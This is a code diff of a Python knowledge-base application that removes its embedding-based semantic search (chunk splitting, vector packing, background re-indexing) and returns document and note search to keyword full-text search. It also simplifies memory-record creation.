"PERMITTED",
|
||||
"Interruption",
|
||||
"Item",
|
||||
|
||||
@@ -1,125 +0,0 @@
|
||||
"""Splitting a record into pieces small enough to embed, and packing vectors.
|
||||
|
||||
One implementation, used by documents, notes, skills and reports. Three would
|
||||
drift, and drift here is invisible: a splitter that behaves differently for
|
||||
notes than for documents produces a search that works and ranks wrongly.
|
||||
|
||||
## How it splits
|
||||
|
||||
On **paragraph boundaries first**, falling back to lines and then to a hard cut,
|
||||
because a chunk that ends mid-sentence is one whose embedding is about half a
|
||||
thought. The overlap carries the tail of the previous chunk into the next, so a
|
||||
sentence that straddles a boundary is whole in one of them.
|
||||
|
||||
Characters rather than tokens throughout. The count has to be made without
|
||||
asking the endpoint -- `services/tokens.py` already establishes four characters
|
||||
to a token as this codebase's estimate, and being 20% out about a chunk size is
|
||||
a slightly different chunk, not a wrong one.
|
||||
|
||||
## Packing
|
||||
|
||||
float32, little-endian. A 1024-dimension vector is 4KB packed and about 20KB as
|
||||
JSON text, and every one of them is read on every semantic search.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import struct
|
||||
|
||||
# Below this a piece is not worth a row: the embedding of six words is mostly
|
||||
# noise, and a search that returns "and the following:" as its best hit is worse
|
||||
# than one that returns nothing.
|
||||
MIN_CHUNK_CHARS = 40
|
||||
|
||||
|
||||
def split(text: str, *, size: int = 1200, overlap: int = 150) -> list[str]:
|
||||
"""A record's text as pieces of roughly `size` characters.
|
||||
|
||||
`overlap` is how much of the previous piece rides along with the next. It is
|
||||
clamped to half the size here as well as in the settings accessor, because
|
||||
an overlap at or past the size means every piece starts where the last one
|
||||
did and the loop never advances -- a hang rather than a bad index, so it is
|
||||
refused in both places rather than in the more convenient one.
|
||||
"""
|
||||
body = (text or "").strip()
|
||||
if not body:
|
||||
return []
|
||||
size = max(200, int(size))
|
||||
overlap = max(0, min(int(overlap), size // 2))
|
||||
if len(body) <= size:
|
||||
return [body]
|
||||
|
||||
pieces: list[str] = []
|
||||
start = 0
|
||||
while start < len(body):
|
||||
end = min(start + size, len(body))
|
||||
if end < len(body):
|
||||
end = _boundary(body, start, end)
|
||||
piece = body[start:end].strip()
|
||||
if len(piece) >= MIN_CHUNK_CHARS:
|
||||
pieces.append(piece)
|
||||
if end >= len(body):
|
||||
break
|
||||
start = max(end - overlap, start + 1)
|
||||
return pieces
|
||||
|
||||
|
||||
def _boundary(body: str, start: int, end: int) -> int:
|
||||
"""Where to cut, preferring a paragraph break and then a line break.
|
||||
|
||||
Searched backwards from the hard limit, and only within the last third of
|
||||
the piece: a paragraph break near the *start* would produce a chunk a
|
||||
fraction of the size, which is how a long document turns into hundreds of
|
||||
tiny rows that each match nothing.
|
||||
"""
|
||||
floor = start + (end - start) * 2 // 3
|
||||
for marker in ("\n\n", "\n", ". "):
|
||||
found = body.rfind(marker, floor, end)
|
||||
if found > floor:
|
||||
return found + len(marker)
|
||||
return end
|
||||
|
||||
|
||||
def digest(text: str) -> str:
|
||||
"""A hash of what a chunk set was built from.
|
||||
|
||||
What makes re-indexing an unchanged record free, and what makes "is this
|
||||
index current?" answerable without embedding anything. sha256 rather than
|
||||
md5 for no reason beyond having no reason to prefer md5; both are being used
|
||||
as a change detector rather than against an adversary.
|
||||
"""
|
||||
return hashlib.sha256((text or "").encode("utf-8")).hexdigest()
|
||||
|
||||
|
||||
def pack(vector: list[float]) -> bytes:
|
||||
return struct.pack(f"<{len(vector)}f", *vector)
|
||||
|
||||
|
||||
def unpack(blob: bytes, dims: int) -> list[float]:
|
||||
"""A stored vector, or an empty list if the row does not add up.
|
||||
|
||||
Length is checked against the declared width rather than inferred from it: a
|
||||
truncated BLOB would otherwise unpack into a shorter vector and score
|
||||
against a query happily, which is a wrong answer rather than a missing one.
|
||||
"""
|
||||
if dims <= 0 or len(blob) != dims * 4:
|
||||
return []
|
||||
return list(struct.unpack(f"<{dims}f", blob))
|
||||
|
||||
|
||||
def dot(left: list[float], right: list[float]) -> float:
|
||||
"""Cosine similarity, given that both sides are already unit vectors.
|
||||
|
||||
Normalisation happens once, at write time, in `llm/embeddings.py` -- so
|
||||
every comparison here is a multiply-and-add rather than two square roots per
|
||||
pair. A width mismatch scores zero rather than raising: it means the vectors
|
||||
came from two different models, and the honest answer to "how similar are
|
||||
these?" across two spaces is "this tells you nothing".
|
||||
"""
|
||||
if len(left) != len(right) or not left:
|
||||
return 0.0
|
||||
return sum(a * b for a, b in zip(left, right, strict=True))
|
||||
|
||||
|
||||
__all__ = ["MIN_CHUNK_CHARS", "digest", "dot", "pack", "split", "unpack"]
|
||||
@@ -18,18 +18,11 @@ from sqlalchemy import select
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.config import settings
|
||||
from lembas.db.models import (
|
||||
CHUNK_DOCUMENT,
|
||||
SOURCE_LINK,
|
||||
SOURCE_UPLOAD,
|
||||
Document,
|
||||
KnowledgeBase,
|
||||
User,
|
||||
)
|
||||
from lembas.db.models import SOURCE_LINK, SOURCE_UPLOAD, Document, KnowledgeBase, User
|
||||
from lembas.services import files as files_service
|
||||
from lembas.services import sharing
|
||||
from lembas.services.fetch import Fetched
|
||||
from lembas.services.library import retrieval
|
||||
from lembas.services.library.fts import search_ids
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
@@ -261,47 +254,6 @@ def get(db: DBSession, document_id: str, user: User | None) -> Document | None:
|
||||
return document
|
||||
|
||||
|
||||
def can_write(document: Document, user: User | None) -> bool:
|
||||
"""Whether this person may change a document's text.
|
||||
|
||||
Ownership, through the same helper every other library store uses. Sharing
|
||||
grants **reading only**, so being able to see a document through somebody
|
||||
else's base is never enough to rewrite it -- and reading is already settled
|
||||
by `get`, which resolves visibility through the base.
|
||||
|
||||
Its own function rather than `sharing.can_write` at the call site because
|
||||
`Document` is the one store whose visibility does not come from itself, and
|
||||
a reader arriving at a bare `sharing.can_write(document, …)` would have to
|
||||
go and check whether that is the right question.
|
||||
"""
|
||||
return sharing.can_write(document, user)
|
||||
|
||||
|
||||
def set_text(db: DBSession, document: Document, text: str) -> Document:
|
||||
"""Replace the extracted text a person reads and a model searches.
|
||||
|
||||
The stored file is untouched: the bytes are the record, and this is what was
|
||||
made of them. That is the same line PDF extraction draws -- extracted once
|
||||
at upload, so a reply cannot change because a parser was upgraded -- and it
|
||||
is why editing this is safe for transcripts: `files.copy_document` copies
|
||||
the text when a document is attached, so an edit only changes what future
|
||||
searches find.
|
||||
|
||||
`extraction_error` is cleared, because replacing a failed extraction by hand
|
||||
is the main reason to want this at all; leaving the old apology beside the
|
||||
new text would be the page contradicting itself.
|
||||
|
||||
The commit fires the `documents_fts` UPDATE trigger, so search stays correct
|
||||
with nothing else to do. See `db/migrations.py:ensure_fts`.
|
||||
"""
|
||||
ceiling = files_service.limits().max_extracted_chars
|
||||
document.extracted_text = text[:ceiling]
|
||||
document.truncated = len(text) > ceiling
|
||||
document.extraction_error = ""
|
||||
db.commit()
|
||||
return document
|
||||
|
||||
|
||||
def search(
|
||||
db: DBSession,
|
||||
user: User | None,
|
||||
@@ -309,22 +261,14 @@ def search(
|
||||
*,
|
||||
limit: int = 10,
|
||||
base_ids: list[str] | None = None,
|
||||
vector: list[float] | None = None,
|
||||
) -> list[Document]:
|
||||
"""Documents matching `needle` that this user may see, best match first.
|
||||
|
||||
The index is searched first and the visibility filter applied to the rows
|
||||
it returned. That order matters: filtering afterwards is what makes it
|
||||
impossible for a hit on somebody else's document to leak, even as a count.
|
||||
|
||||
`vector` is the query already embedded, or None. It comes from the caller
|
||||
rather than being worked out here because this is synchronous and embedding
|
||||
is an HTTP request -- see `services/library/retrieval.py`. None means the
|
||||
keyword search exactly as it always was.
|
||||
"""
|
||||
hits = retrieval.search(
|
||||
db, INDEX, needle, kind=CHUNK_DOCUMENT, vector=vector, limit=limit * 4
|
||||
)
|
||||
hits = search_ids(db, INDEX, needle, limit=limit * 4)
|
||||
if not hits:
|
||||
return []
|
||||
|
||||
|
||||
@@ -1,529 +0,0 @@
|
||||
"""Keeping the semantic index current, and rebuilding it when it is not.
|
||||
|
||||
## The shape, and why it is a background task
|
||||
|
||||
Embedding is an HTTP request. Every writer in the library -- `documents.create`,
|
||||
`notes.edit`, `skills.save`, `reports.create` -- is synchronous and is called
|
||||
from a route or a tool runner that has just committed a row, and none of them
|
||||
should wait on a model server to answer before saying "saved".
|
||||
|
||||
So indexing is **fired and forgotten**: `schedule(kind, id)` starts a task and
|
||||
returns immediately. A save that cannot be indexed is a save; the row is written
|
||||
either way and the search falls back to keywords for that record until the next
|
||||
rebuild. That is the whole degradation story, and it is the same one that covers
|
||||
having no embedding model at all.
|
||||
|
||||
## Nothing is written when no model is chosen
|
||||
|
||||
`embedding_model_id` empty means the FTS path exactly as it has always been --
|
||||
no chunk rows, no requests, no cost. That is what makes this safe to add to an
|
||||
instance that never asked for it, and it is asserted rather than assumed.
|
||||
|
||||
## Staleness is a hash, not a timestamp
|
||||
|
||||
Every chunk carries `source_hash` (of the text it was built from), `model_id`
|
||||
and `dims`. Re-indexing an unchanged record is free; a record whose text moved
|
||||
is rebuilt; a record embedded by a *different* model is rebuilt on the next pass
|
||||
and, until then, ignored by the scorer rather than trusted. Vectors from two
|
||||
spaces score against each other perfectly happily and mean nothing, which is a
|
||||
search that works and is wrong -- the worst failure this feature can have.
|
||||
|
||||
## The rebuild is restartable and reports itself
|
||||
|
||||
A half-finished index has to be usable rather than empty, so the rebuild walks
|
||||
records one at a time and commits each. `progress()` is what the admin page
|
||||
polls; it is in-process, because a rebuild does not survive a restart and
|
||||
pretending otherwise would mean a progress bar that never moves.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import contextlib
|
||||
import logging
|
||||
from dataclasses import dataclass, field
|
||||
|
||||
from sqlalchemy import delete, func, select
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.db.models import (
|
||||
CHUNK_DOCUMENT,
|
||||
CHUNK_KINDS,
|
||||
CHUNK_NOTE,
|
||||
CHUNK_REPORT,
|
||||
CHUNK_SKILL,
|
||||
Chunk,
|
||||
Connection,
|
||||
Document,
|
||||
Model,
|
||||
Note,
|
||||
Report,
|
||||
Skill,
|
||||
)
|
||||
from lembas.db.session import session_scope
|
||||
from lembas.services import settings_store
|
||||
from lembas.services.library import chunks as chunk_service
|
||||
from lembas.services.llm.openai_client import Endpoint, LLMError
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
# What each kind is, and how to get its text. One table rather than four
|
||||
# branches, for the reason `tool_labels` is one table: four copies of "which
|
||||
# columns make up the searchable text" is three chances to disagree.
|
||||
SOURCES: dict[str, tuple[type, tuple[str, ...]]] = {
|
||||
CHUNK_DOCUMENT: (Document, ("title", "description", "extracted_text")),
|
||||
CHUNK_NOTE: (Note, ("title", "body")),
|
||||
CHUNK_SKILL: (Skill, ("name", "description", "body")),
|
||||
CHUNK_REPORT: (Report, ("title", "summary", "body")),
|
||||
}
|
||||
|
||||
# Tasks in flight, so a record saved twice in quick succession is indexed once
|
||||
# more rather than twice at the same time. Keyed on kind and id.
|
||||
_TASKS: dict[tuple[str, str], asyncio.Task] = {}
|
||||
|
||||
|
||||
# --- What the model is ----------------------------------------------------------
|
||||
@dataclass(frozen=True)
|
||||
class Embedder:
|
||||
"""Which model turns text into vectors, resolved while a session is open."""
|
||||
|
||||
endpoint: Endpoint
|
||||
model_id: str
|
||||
batch: int = 16
|
||||
|
||||
|
||||
def embedder(db: DBSession) -> Embedder | None:
|
||||
"""The configured embedding model, or None.
|
||||
|
||||
None is the answer to every "no" -- none chosen, the model row deleted, its
|
||||
connection disabled -- and every caller reads it the same way: do nothing,
|
||||
and let the keyword search stand. That is deliberately not an error. An
|
||||
instance that never configured this is the common case, not a broken one.
|
||||
"""
|
||||
values = settings_store.extraction(db)
|
||||
wanted = str(values.get("embedding_model_id") or "").strip()
|
||||
if not wanted:
|
||||
return None
|
||||
model = db.scalar(
|
||||
select(Model)
|
||||
.join(Connection)
|
||||
.where(
|
||||
Model.model_id == wanted,
|
||||
Model.enabled.is_(True),
|
||||
Connection.enabled.is_(True),
|
||||
)
|
||||
.order_by(Connection.position)
|
||||
)
|
||||
if model is None:
|
||||
log.info("embedding model %r is configured but not available", wanted)
|
||||
return None
|
||||
connection = db.get(Connection, model.connection_id)
|
||||
if connection is None:
|
||||
return None
|
||||
return Embedder(
|
||||
endpoint=Endpoint.from_connection(connection),
|
||||
model_id=model.model_id,
|
||||
batch=int(values.get("embed_batch") or 16),
|
||||
)
|
||||
|
||||
|
||||
def enabled(db: DBSession) -> bool:
|
||||
return embedder(db) is not None
|
||||
|
||||
|
||||
# --- Reading a record -----------------------------------------------------------
|
||||
def text_of(row) -> str:
|
||||
"""The searchable text of one record, in the same order the FTS index uses.
|
||||
|
||||
Blank fields are dropped rather than joined as empty lines, so a note with
|
||||
no body hashes the same before and after somebody clears its body twice.
|
||||
"""
|
||||
kind = kind_of(row)
|
||||
if kind is None:
|
||||
return ""
|
||||
_, columns = SOURCES[kind]
|
||||
parts = [str(getattr(row, name, "") or "").strip() for name in columns]
|
||||
return "\n\n".join(part for part in parts if part)
|
||||
|
||||
|
||||
def kind_of(row) -> str | None:
|
||||
for kind, (model, _) in SOURCES.items():
|
||||
if isinstance(row, model):
|
||||
return kind
|
||||
return None
|
||||
|
||||
|
||||
def owner_of(row) -> str:
|
||||
return str(getattr(row, "owner_id", "") or "")
|
||||
|
||||
|
||||
# --- Writing the index ----------------------------------------------------------
|
||||
def forget_resource(db: DBSession, kind: str, resource_id: str) -> int:
|
||||
"""Drop every chunk of one record. Called when it is deleted.
|
||||
|
||||
A plain DELETE rather than a cascade, because `resource_id` has no foreign
|
||||
key -- it points at one of four tables depending on `resource_type`, which
|
||||
SQLite cannot express. Same reasoning as `Share.principal_id`.
|
||||
"""
|
||||
result = db.execute(
|
||||
delete(Chunk).where(Chunk.resource_type == kind, Chunk.resource_id == resource_id)
|
||||
)
|
||||
db.commit()
|
||||
return int(result.rowcount or 0)
|
||||
|
||||
|
||||
def current_hash(db: DBSession, kind: str, resource_id: str) -> tuple[str, str]:
|
||||
"""The hash and model of the chunks already stored for a record."""
|
||||
row = db.execute(
|
||||
select(Chunk.source_hash, Chunk.model_id)
|
||||
.where(Chunk.resource_type == kind, Chunk.resource_id == resource_id)
|
||||
.limit(1)
|
||||
).first()
|
||||
return (str(row[0] or ""), str(row[1] or "")) if row else ("", "")
|
||||
|
||||
|
||||
async def index_resource(kind: str, resource_id: str, *, force: bool = False) -> int:
|
||||
"""Rebuild one record's chunks. Returns how many were written.
|
||||
|
||||
Opens its own session, for the reason every background worker here does: it
|
||||
outlives the request that scheduled it. Never raises -- a failure leaves the
|
||||
old chunks in place, which is a slightly stale index rather than a hole, and
|
||||
is strictly better than deleting first and failing to write.
|
||||
"""
|
||||
if kind not in SOURCES:
|
||||
return 0
|
||||
try:
|
||||
with session_scope() as db:
|
||||
model, _ = SOURCES[kind]
|
||||
row = db.get(model, resource_id)
|
||||
if row is None:
|
||||
forget_resource(db, kind, resource_id)
|
||||
return 0
|
||||
worker = embedder(db)
|
||||
if worker is None:
|
||||
return 0
|
||||
body = text_of(row)
|
||||
owner = owner_of(row)
|
||||
values = settings_store.extraction(db)
|
||||
digest = chunk_service.digest(body)
|
||||
stored_hash, stored_model = current_hash(db, kind, resource_id)
|
||||
|
||||
if not body.strip():
|
||||
with session_scope() as db:
|
||||
forget_resource(db, kind, resource_id)
|
||||
return 0
|
||||
if not force and digest == stored_hash and stored_model == worker.model_id:
|
||||
return 0
|
||||
|
||||
pieces = chunk_service.split(
|
||||
body, size=int(values["chunk_chars"]), overlap=int(values["chunk_overlap"])
|
||||
)
|
||||
if not pieces:
|
||||
with session_scope() as db:
|
||||
forget_resource(db, kind, resource_id)
|
||||
return 0
|
||||
|
||||
vectors = await _embed_all(worker, pieces)
|
||||
|
||||
# Written only once every vector is in hand. Deleting first and failing
|
||||
# half way through would leave a record indexed by half of itself, which
|
||||
# ranks worse than not being indexed at all and looks like nothing.
|
||||
with session_scope() as db:
|
||||
db.execute(
|
||||
delete(Chunk).where(
|
||||
Chunk.resource_type == kind, Chunk.resource_id == resource_id
|
||||
)
|
||||
)
|
||||
for ordinal, (piece, vector) in enumerate(zip(pieces, vectors, strict=True)):
|
||||
db.add(
|
||||
Chunk(
|
||||
owner_id=owner,
|
||||
resource_type=kind,
|
||||
resource_id=resource_id,
|
||||
ordinal=ordinal,
|
||||
text=piece,
|
||||
vector=chunk_service.pack(vector),
|
||||
dims=len(vector),
|
||||
model_id=worker.model_id,
|
||||
source_hash=digest,
|
||||
)
|
||||
)
|
||||
db.commit()
|
||||
return len(pieces)
|
||||
except LLMError as exc:
|
||||
log.info("could not index %s %s: %s", kind, resource_id, exc)
|
||||
return 0
|
||||
except asyncio.CancelledError:
|
||||
raise
|
||||
except Exception: # noqa: BLE001 - one bad record must not stop a rebuild
|
||||
log.exception("indexing %s %s failed", kind, resource_id)
|
||||
return 0
|
||||
|
||||
|
||||
async def _embed_all(worker: Embedder, pieces: list[str]) -> list[list[float]]:
|
||||
from lembas.services.llm import embeddings as embeddings_service
|
||||
|
||||
vectors: list[list[float]] = []
|
||||
for start in range(0, len(pieces), worker.batch):
|
||||
batch = pieces[start : start + worker.batch]
|
||||
vectors.extend(await embeddings_service.embed(worker.endpoint, worker.model_id, batch))
|
||||
return vectors
|
||||
|
||||
|
||||
# --- Scheduling -----------------------------------------------------------------
|
||||
def schedule(kind: str, resource_id: str) -> None:
|
||||
"""Index a record soon, without making its writer wait.
|
||||
|
||||
Called from synchronous writers that have just committed. Two things it is
|
||||
careful about:
|
||||
|
||||
- **No running loop means do nothing.** A CLI command, a test, or the
|
||||
startup sweep has no event loop to attach to, and building a coroutine
|
||||
there produces "never awaited" at the caller's own line. The check is
|
||||
before the coroutine, the same trap `push.announce_later` documents.
|
||||
- **A record already being indexed is left alone.** Saving twice in a second
|
||||
would otherwise embed the same text twice at once; the second call is
|
||||
dropped and the record is picked up by the *next* save or rebuild, which
|
||||
is why `index_resource` re-reads the row rather than taking text passed in.
|
||||
"""
|
||||
if kind not in SOURCES or not resource_id:
|
||||
return
|
||||
try:
|
||||
asyncio.get_running_loop()
|
||||
except RuntimeError:
|
||||
return
|
||||
key = (kind, resource_id)
|
||||
existing = _TASKS.get(key)
|
||||
if existing is not None and not existing.done():
|
||||
return
|
||||
task = asyncio.create_task(index_resource(kind, resource_id))
|
||||
_TASKS[key] = task
|
||||
task.add_done_callback(lambda _t, k=key: _TASKS.pop(k, None))
|
||||
|
||||
|
||||
def schedule_for(row) -> None:
|
||||
"""The same, given a record rather than its kind and id."""
|
||||
kind = kind_of(row)
|
||||
if kind is not None:
|
||||
schedule(kind, str(getattr(row, "id", "") or ""))
|
||||
|
||||
|
||||
# --- Noticing a change ----------------------------------------------------------
|
||||
# Two SQLAlchemy session events rather than a call in each of the ten writers
|
||||
# that touch these four tables. That is a departure from this codebase's taste
|
||||
# for explicit seams, and the reason is the one `tool_label` gives for being a
|
||||
# Jinja global: a step every writer has to remember is a step one of them will
|
||||
# forget, and here forgetting is *silent* -- the record saves, the keyword search
|
||||
# still finds it, and only its semantic recall is quietly stale.
|
||||
#
|
||||
# `after_flush` collects and `after_commit` acts, in that order and never
|
||||
# merged. Inside a flush the transaction has not landed yet, so a task started
|
||||
# there could read the row before it exists; and `session.deleted` is empty by
|
||||
# the time the commit fires, so the collecting has to happen while it is not.
|
||||
_PENDING = "lembas_index_pending"
|
||||
|
||||
|
||||
def _collect(session, _flush_context) -> None:
|
||||
seen: set[tuple[str, str]] = session.info.setdefault(_PENDING, set())
|
||||
for row in (*session.new, *session.dirty, *session.deleted):
|
||||
kind = kind_of(row)
|
||||
if kind is None:
|
||||
continue
|
||||
resource_id = str(getattr(row, "id", "") or "")
|
||||
if resource_id:
|
||||
seen.add((kind, resource_id))
|
||||
|
||||
|
||||
def _fire(session) -> None:
|
||||
# A deletion is scheduled exactly like a change: `index_resource` finds no
|
||||
# row and drops the chunks. One path rather than two, and the one that runs
|
||||
# is the one that has to be right anyway.
|
||||
for kind, resource_id in session.info.pop(_PENDING, set()):
|
||||
schedule(kind, resource_id)
|
||||
|
||||
|
||||
def _forget(session) -> None:
|
||||
session.info.pop(_PENDING, None)
|
||||
|
||||
|
||||
def install() -> None:
|
||||
"""Listen for library records changing. Called once, from the app factory.
|
||||
|
||||
Idempotent: `event.contains` is checked, because the app factory is called
|
||||
per test in the suite and registering the same listener a hundred times
|
||||
would index every record a hundred times over.
|
||||
"""
|
||||
from sqlalchemy import event
|
||||
from sqlalchemy.orm import Session
|
||||
|
||||
for name, handler in (
|
||||
("after_flush", _collect),
|
||||
("after_commit", _fire),
|
||||
("after_rollback", _forget),
|
||||
):
|
||||
if not event.contains(Session, name, handler):
|
||||
event.listen(Session, name, handler)
|
||||
|
||||
|
||||
def sweep_orphans(db: DBSession) -> int:
|
||||
"""Drop chunks whose record has gone.
|
||||
|
||||
A backstop for the one case the listeners cannot cover: a delete that
|
||||
happened with no event loop running -- a CLI command, a test, a cascade from
|
||||
deleting a user -- where `schedule` had nowhere to put its task. Cheap
|
||||
enough to run at startup and at the end of every rebuild: one NOT IN per
|
||||
kind, against an indexed column.
|
||||
"""
|
||||
removed = 0
|
||||
for kind, (model, _) in SOURCES.items():
|
||||
result = db.execute(
|
||||
delete(Chunk).where(
|
||||
Chunk.resource_type == kind,
|
||||
Chunk.resource_id.not_in(select(model.id)),
|
||||
)
|
||||
)
|
||||
removed += int(result.rowcount or 0)
|
||||
if removed:
|
||||
db.commit()
|
||||
log.info("dropped %d orphaned chunk(s)", removed)
|
||||
return removed
|
||||
|
||||
|
||||
# --- Rebuilding everything ------------------------------------------------------
|
||||
@dataclass
|
||||
class Progress:
|
||||
"""What a rebuild has done so far.
|
||||
|
||||
In-process, because a rebuild does not survive a restart. Persisting it
|
||||
would mean a progress bar that stops moving and never finishes, which is
|
||||
worse than one that admits it is gone.
|
||||
"""
|
||||
|
||||
running: bool = False
|
||||
total: int = 0
|
||||
done: int = 0
|
||||
written: int = 0
|
||||
error: str = ""
|
||||
kinds: dict[str, int] = field(default_factory=dict)
|
||||
|
||||
@property
|
||||
def percent(self) -> int:
|
||||
return int(self.done * 100 / self.total) if self.total else 0
|
||||
|
||||
|
||||
_PROGRESS = Progress()
|
||||
_REBUILD: asyncio.Task | None = None
|
||||
|
||||
|
||||
def progress() -> Progress:
|
||||
return _PROGRESS
|
||||
|
||||
|
||||
def counts(db: DBSession) -> dict[str, int]:
|
||||
"""How many chunks exist per kind. What the page shows when nothing is running."""
|
||||
rows = db.execute(
|
||||
select(Chunk.resource_type, func.count()).group_by(Chunk.resource_type)
|
||||
).all()
|
||||
return {str(kind): int(count) for kind, count in rows}
|
||||
|
||||
|
||||
async def rebuild_all(*, force: bool = True) -> None:
|
||||
"""Walk every record and index it, committing as it goes.
|
||||
|
||||
One at a time and never gathered. The far side is usually one local model
|
||||
server, and twenty concurrent embedding requests against it is slower than
|
||||
twenty sequential ones as well as being ruder.
|
||||
"""
|
||||
global _PROGRESS
|
||||
_PROGRESS = Progress(running=True)
|
||||
try:
|
||||
with session_scope() as db:
|
||||
if embedder(db) is None:
|
||||
_PROGRESS.error = "No embedding model is configured."
|
||||
return
|
||||
work: list[tuple[str, str]] = []
|
||||
for kind, (model, _) in SOURCES.items():
|
||||
ids = [row[0] for row in db.execute(select(model.id)).all()]
|
||||
work.extend((kind, str(row_id)) for row_id in ids)
|
||||
_PROGRESS.total = len(work)
|
||||
|
||||
for kind, resource_id in work:
|
||||
written = await index_resource(kind, resource_id, force=force)
|
||||
_PROGRESS.done += 1
|
||||
_PROGRESS.written += written
|
||||
_PROGRESS.kinds[kind] = _PROGRESS.kinds.get(kind, 0) + written
|
||||
|
||||
# After the walk, not before: a record deleted while this was running
|
||||
# would otherwise be swept and then re-indexed from a row that no longer
|
||||
# exists. `index_resource` handles that case too, and doing it in this
|
||||
# order means one pass reconciles both directions.
|
||||
with session_scope() as db:
|
||||
sweep_orphans(db)
|
||||
except asyncio.CancelledError:
|
||||
_PROGRESS.error = "Stopped."
|
||||
raise
|
||||
except Exception as exc: # noqa: BLE001 - a rebuild failing must be reportable
|
||||
log.exception("rebuilding the index failed")
|
||||
_PROGRESS.error = str(exc)
|
||||
finally:
|
||||
_PROGRESS.running = False
|
||||
|
||||
|
||||
def start_rebuild(*, force: bool = True) -> bool:
|
||||
"""Start a rebuild if one is not already going. True if this call started it."""
|
||||
global _REBUILD
|
||||
if _REBUILD is not None and not _REBUILD.done():
|
||||
return False
|
||||
try:
|
||||
asyncio.get_running_loop()
|
||||
except RuntimeError:
|
||||
return False
|
||||
_REBUILD = asyncio.create_task(rebuild_all(force=force))
|
||||
return True
|
||||
|
||||
|
||||
async def shutdown() -> None:
|
||||
"""Cancel the rebuild and any in-flight indexing.
|
||||
|
||||
Nothing here is lost that matters: a chunk set is either written whole or
|
||||
not at all, and the next rebuild picks up whatever was missed.
|
||||
"""
|
||||
global _REBUILD
|
||||
tasks = [task for task in (_REBUILD, *_TASKS.values()) if task is not None]
|
||||
_TASKS.clear()
|
||||
_REBUILD = None
|
||||
for task in tasks:
|
||||
task.cancel()
|
||||
for task in tasks:
|
||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||
await task
|
||||
|
||||
|
||||
def clear() -> None:
|
||||
"""For tests: forget the in-process state without touching the database."""
|
||||
global _REBUILD, _PROGRESS
|
||||
_TASKS.clear()
|
||||
_REBUILD = None
|
||||
_PROGRESS = Progress()
|
||||
|
||||
|
||||
__all__ = [
|
||||
"CHUNK_KINDS",
|
||||
"SOURCES",
|
||||
"Embedder",
|
||||
"Progress",
|
||||
"clear",
|
||||
"counts",
|
||||
"embedder",
|
||||
"enabled",
|
||||
"forget_resource",
|
||||
"index_resource",
|
||||
"kind_of",
|
||||
"progress",
|
||||
"rebuild_all",
|
||||
"schedule",
|
||||
"schedule_for",
|
||||
"shutdown",
|
||||
"start_rebuild",
|
||||
"text_of",
|
||||
]
|
||||
@@ -57,45 +57,23 @@ def get(db: DBSession, memory_id: str, user: User | None) -> Memory | None:
|
||||
|
||||
|
||||
def add(db: DBSession, *, owner: User, content: str, author: str = AUTHOR_MODEL) -> Memory:
|
||||
"""Record a fact. Raises ValueError when there is no room or nothing to say.
|
||||
|
||||
An exact repeat returns the record that already exists rather than making a
|
||||
second one. The prompt asks the model to check before adding -- it is shown
|
||||
every memory, so it can -- but the same preference saved four times in
|
||||
slightly different words is the commonest failure here, and it is worse than
|
||||
wasted tokens: it makes `memory_forget` ambiguous for every one of them.
|
||||
Wording handles the near-duplicates; this handles the exact ones, which is
|
||||
the half a prompt cannot be relied on for.
|
||||
"""
|
||||
"""Record a fact. Raises ValueError when there is no room or nothing to say."""
|
||||
content = " ".join((content or "").split())
|
||||
if not content:
|
||||
raise ValueError("A memory cannot be empty.")
|
||||
content = content[:MAX_MEMORY_CHARS]
|
||||
|
||||
existing = db.scalars(
|
||||
select(Memory).where(Memory.owner_id == owner.id, Memory.content == content)
|
||||
).first()
|
||||
if existing is not None:
|
||||
return existing
|
||||
|
||||
count = db.scalar(
|
||||
select(func.count()).select_from(Memory).where(Memory.owner_id == owner.id)
|
||||
)
|
||||
if (count or 0) >= MAX_RECORDS:
|
||||
# Deliberately does NOT say "remove one first". Past MAX_TOTAL_CHARS the
|
||||
# injected block is truncated, so the model is not shown every memory
|
||||
# and would be choosing blind -- and deleting the wrong one is not
|
||||
# something anybody finds out about.
|
||||
raise ValueError(
|
||||
f"There are already {MAX_RECORDS} memories, which is the limit, so "
|
||||
f"nothing was saved. Do not remove one to make room — you are not "
|
||||
f"shown all of them and would be guessing. Say that the limit has "
|
||||
f"been reached, and put this in a note instead."
|
||||
f"There are already {MAX_RECORDS} memories. Remove one first, or put "
|
||||
f"this in a note instead."
|
||||
)
|
||||
|
||||
memory = Memory(
|
||||
owner_id=owner.id,
|
||||
content=content,
|
||||
content=content[:MAX_MEMORY_CHARS],
|
||||
author=author if author in (AUTHOR_USER, AUTHOR_MODEL) else AUTHOR_MODEL,
|
||||
)
|
||||
db.add(memory)
|
||||
|
||||
@@ -13,9 +13,9 @@ import logging
|
||||
from sqlalchemy import select
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.db.models import AUTHOR_MODEL, AUTHOR_USER, CHUNK_NOTE, Note, User
|
||||
from lembas.db.models import AUTHOR_MODEL, AUTHOR_USER, Note, User
|
||||
from lembas.services import sharing
|
||||
from lembas.services.library import retrieval
|
||||
from lembas.services.library.fts import search_ids
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
@@ -43,22 +43,9 @@ def recent(db: DBSession, user: User | None, *, limit: int = 20) -> list[Note]:
|
||||
)
|
||||
|
||||
|
||||
def search(
|
||||
db: DBSession,
|
||||
user: User | None,
|
||||
needle: str,
|
||||
*,
|
||||
limit: int = 10,
|
||||
vector: list[float] | None = None,
|
||||
) -> list[Note]:
|
||||
"""Notes matching `needle` that this user may see, best match first.
|
||||
|
||||
`vector` is the query already embedded, or None. It comes from the caller
|
||||
rather than being worked out here because this is synchronous and embedding
|
||||
is an HTTP request -- see `services/library/retrieval.py`. None means the
|
||||
keyword search exactly as it always was.
|
||||
"""
|
||||
hits = retrieval.search(db, INDEX, needle, kind=CHUNK_NOTE, vector=vector, limit=limit * 4)
|
||||
def search(db: DBSession, user: User | None, needle: str, *, limit: int = 10) -> list[Note]:
|
||||
"""Notes matching `needle` that this user may see, best match first."""
|
||||
hits = search_ids(db, INDEX, needle, limit=limit * 4)
|
||||
